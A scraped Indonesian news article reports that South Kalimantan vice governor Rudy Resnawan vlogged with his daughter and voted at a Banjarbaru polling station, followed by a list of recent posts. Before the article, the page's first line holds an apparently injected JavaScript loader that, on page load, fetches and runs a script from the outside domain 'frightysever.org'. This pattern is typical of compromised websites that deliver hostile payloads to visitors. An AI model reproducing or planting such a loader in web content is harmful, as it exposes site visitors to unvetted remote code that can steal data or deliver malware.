(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Politik

Sebelum Mencoblos, Wagub Kalsel Ngevlog di TPS 09 Klausreppe Banjarbaru


BANJARBARU, Jika Gubernur Kalsel H Sahbirin Noor mencoblos di Banjarmasin. Wakil Gubernur Kalsel Rudy Resnawan menggunakan hak pilihnya di TPS 09, jalan Jakarta kompleks Klausreppe, Kelurahan Loktabat Selatan, Rabu (17/4) siang.

Rudy Resnawan datang menggunakan kemeja merah, kemudian sempat nge-vlog bersama anak bungsunya, Luna.

“Ya saat ini saya sudah di TPS, dan menunggu antrean mau mencoblos,” kata Wagub Rudy Resnawan di media sosial anaknya, saat berada di TPS.

Begitu menunggu antrean banyak warga sekitar menyempatkan diri untuk  berfoto dengan Wakil Gubernur Kalsel. Tampak, seketika mencoblos Rudy Resnawan membuka sesama kertas surat suara dan menunjukkan ke arah kamera.

Sadar kalau disebelahnya adalah Wakil Gubernur, ibu-ibu di bilik sebelah canggung dan bahkan paku untuk tusuk surat suara jatuh. “Nah kan karena grogi ibu jadi jatuh pakunya,”. Tak lama Rudy melanjutkan mencoblos dan kemudian memasukkan surat suara sesuai dengan kode warna yang disediakan KPPS di TPS tersebut.

Wakil Gubernur Kalsel, Rudy Resnawan menjelaskan hari ini dirinya telah melaksanakan hak suara pada Pilpres dan Pileg ini.

“Sebagai warga negara yang baik saya juga ikut mencoblos. Saya lihat Pada pemilu di TPS 09 ini berjalan cukup baik. Masyarakat juga antusias memberikan hak suaranya,” kata Wagub.

Wagub menambahkan, antusiasme masyarakat terlihat di TPS 09 Loktabat Selatan, dari 276 DPT yang tercatat, yang sudah memberikan surat suaranya sampai siang ini sudah mencapai 167 pemilih.

Ia berharap masyarakat Kalsel pada khususnya, dengan selesainya pemilihan hak suara ini kita semua bisa bersatu kembali.

“Siapapun yang dipilih, yang memang tetap Indonesia. Karena Indonesia Bhineka Tinggal Ika, walupun berbeda-beda tetap satu jua,” kata Rudy Resnawan.

Ketua PPS di TPS 09,Chamim Thohari bersyukur pelaksanaan pemilihan dengan lancar. “Alhamdulillah lancar dan tertib,”  kata Chamim Thohari. (rico)

 

Reporter : rico
Editor : Bie

Desy Arfianty

Recent Posts

Dialog Pekerja Pengusaha di Balai Kota, Ini Kata Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Kota Banjarbaru menggelar dialog serikat pengusaha dan serikat pekerja peringatan Hari… Read More

2 jam ago

DPMD HSU Apresiasi Kader Desa Pemenang Lomba Posyandu 2024

KANALKALIMANTAN.COM, AMUNTAI - Dinas Pemberdayaan Masyarakat dan Desa (DPMD) Kabupaten Hulu Sungai Utara (HSU) memberikan… Read More

2 jam ago

Pemondokan Kafilah HSU Dikunjungi Sekda Tapin

KANALKALIMANTAN.COM, RANTAU - Sambutan hangat ditunjukkan Kafilah Hulu Sungai Utara (HSU) saat menerima kedatangan Sekertaris… Read More

3 jam ago

KPU Banjarbaru Terima 96 Pendaftar Calon PPK

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima 96 pendaftar calon anggota Panitia… Read More

4 jam ago

Sejarah 1 Mei 1952 : Dari Afdeeling Amoentai Menjadi Kabupaten Hulu Sungai Utara

KANALKALIMANTAN.COM, AMUNTAI - Tepat hari ini Rabu 1 Mei 2024, 72 tahun silam atau tepatnya… Read More

4 jam ago

PLN Gelar Halalbihalal Bersama Anak-anak Panti Asuhan

KANALKALIMANTAN.COM, PONTIANAK - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

5 jam ago

This website uses cookies.